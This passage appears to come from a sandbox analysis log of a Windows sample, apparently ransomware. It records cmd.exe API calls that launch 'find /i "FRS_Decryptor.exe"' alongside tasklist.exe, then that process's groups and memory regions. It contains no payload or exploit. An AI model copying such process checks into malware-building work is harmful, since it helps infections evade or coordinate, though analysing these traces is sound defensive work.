lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0xffffffff [0075.375] GetLastError () returned 0x2 [0075.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff698, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff698) returned 0x895628 [0075.376] FindClose (in: hFindFile=0x895628 | out: hFindFile=0x895628) returned 1 [0075.376] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0075.376] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0075.376] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0075.376] SetErrorMode (uMode=0x0) returned 0x0 [0075.376] SetErrorMode (uMode=0x1) returned 0x0 [0075.376] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x894668, lpFilePart=0x4ff6b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff6b4*="Desktop") returned 0x1c [0075.376] SetErrorMode (uMode=0x0) returned 0x1 [0075.376] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.376] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0075.376] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.376] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0xffffffff [0075.377] GetLastError () returned 0x2 [0075.377] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0075.377] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0x8904a0 [0075.377] FindClose (in: hFindFile=0x8904a0 | out: hFindFile=0x8904a0) returned 1 [0075.377] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0xffffffff [0075.377] GetLastError () returned 0x2 [0075.377] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x4ff440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff440) returned 0x8904a0 [0075.377] FindClose (in: hFindFile=0x8904a0 | out: hFindFile=0x8904a0) returned 1 [0075.378] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0075.378] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0075.378] GetConsoleTitleW (in: lpConsoleTitle=0x4ff93c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0075.379] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff868, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff84c | out: lpAttributeList=0x4ff868, lpSize=0x4ff84c) returned 1 [0075.379] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff868, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff854, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff868, lpPreviousValue=0x0) returned 1 [0075.379] GetStartupInfoW (in: lpStartupInfo=0x4ff8a0 | out: lpStartupInfo=0x4ff8a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2a0, hStdError=0x2c)) [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0075.379] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0075.380] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0075.380] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0075.380] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x4ff7f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff83c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x4ff83c*(hProcess=0x60, hThread=0x54, dwProcessId=0xafc, dwThreadId=0x3d4)) returned 1 [0075.383] CloseHandle (hObject=0x54) returned 1 [0075.383] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0075.383] GetEnvironmentStringsW () returned 0x89ad78* [0075.383] FreeEnvironmentStringsA (penv="=") returned 1 [0075.383] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff868 | out: lpAttributeList=0x4ff868) [0075.383] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0075.384] _close (_FileHandle=4) returned 0 [0075.384] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0075.893] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x4ffbb0 | out: lpExitCode=0x4ffbb0*=0x0) returned 1 [0075.893] CloseHandle (hObject=0x64) returned 1 [0075.894] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0075.895] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x4ffbb0 | out: lpExitCode=0x4ffbb0*=0x0) returned 1 [0075.896] CloseHandle (hObject=0x60) returned 1 [0075.896] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0075.896] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0075.896] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0075.896] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0075.896] _get_osfhandle (_FileHandle=0) returned 0x24 [0075.896] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0075.896] SetConsoleInputExeNameW () returned 0x1 [0075.896] GetConsoleOutputCP () returned 0x1b5 [0075.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0075.896] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.896] exit (_Code=0) Process: id = "55" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x7d40000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xaec" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2967 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 2968 start_va = 0xf60000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 2969 start_va = 0xf80000 end_va = 0xf81fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 2970 start_va = 0xf90000 end_va = 0xf9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 2971 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 2972 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2973 start_va = 0x1020000 end_va = 0x1023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 2974 start_va = 0x1030000 end_va = 0x1030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 2975 start_va = 0x1040000 end_va = 0x1041fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2976 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2977 start_va = 0x7ee60000 end_va = 0x7ee82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee60000" filename = "" Region: id = 2978 start_va = 0x7ee84000 end_va = 0x7ee84fff entry_point = 0x0 region_type = private name = "private_0x000000007ee84000" filename = "" Region: id = 2979 start_va = 0x7ee8a000 end_va = 0x7ee8afff entry_point = 0x0 region_type = private name = "private_0x000000007ee8a000" filename = "" Region: id = 2980 start_va = 0x7ee8d000 end_va = 0x7ee8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee8d000" filename = "" Region: id = 2981 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2982 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2983 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2984 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3004 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 3005 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3006 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3007 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3021 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 3022 start_va = 0xf70000 end_va = 0xf73fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 3023 start_va = 0xf80000 end_va = 0xf82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 3024 start_va = 0x1050000 end_va = 0x10cdfff entry_point = 0x1050000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3025 start_va = 0x10d0000 end_va = 0x10d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 3026 start_va = 0x10e0000 end_va = 0x10e0fff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 3027 start_va = 0x10f0000 end_va = 0x10f0fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 3028 start_va = 0x1100000 end_va = 0x1103fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3029 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 3030 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 3031 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 3032 start_va = 0x12d0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3033 start_va = 0x13d0000 end_va = 0x1557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 3034 start_va = 0x1560000 end_va = 0x16e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001560000" filename = "" Region: id = 3035 start_va = 0x16f0000 end_va = 0x2aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016f0000" filename = "" Region: id = 3036 start_va = 0x2af0000 end_va = 0x2c31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Region: id = 3037 start_va = 0x2c40000 end_va = 0x2f14fff entry_point = 0x2c40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3038 start_va = 0x2f20000 end_va = 0x331bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f20000" filename = "" Region: id = 3039 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3040 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3041 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3042 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3043 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3044 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3045 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3046 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3047 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3048 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3049 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3050 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3051 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3052 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3053 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3054 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3055 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3056 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3057 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3058 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3059 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3060 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3061 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3062 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3063 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3064 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3065 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3066 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3067 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3068 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3069 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3070 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3071 start_va = 0x7ed60000 end_va = 0x7ee5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed60000" filename = "" Region: id = 3072 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3076 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3077 start_va = 0x1180000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 3078 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 3079 start_va = 0x1240000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3080 start_va = 0x1280000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3081 start_va = 0x3320000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 3082 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3083 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3084 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3085 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3086 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3087 start_va = 0x7ed5a000 end_va = 0x7ed5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed5a000" filename = "" Region: id = 3088 start_va = 0x7ed5d000 end_va = 0x7ed5ffff entry_point = 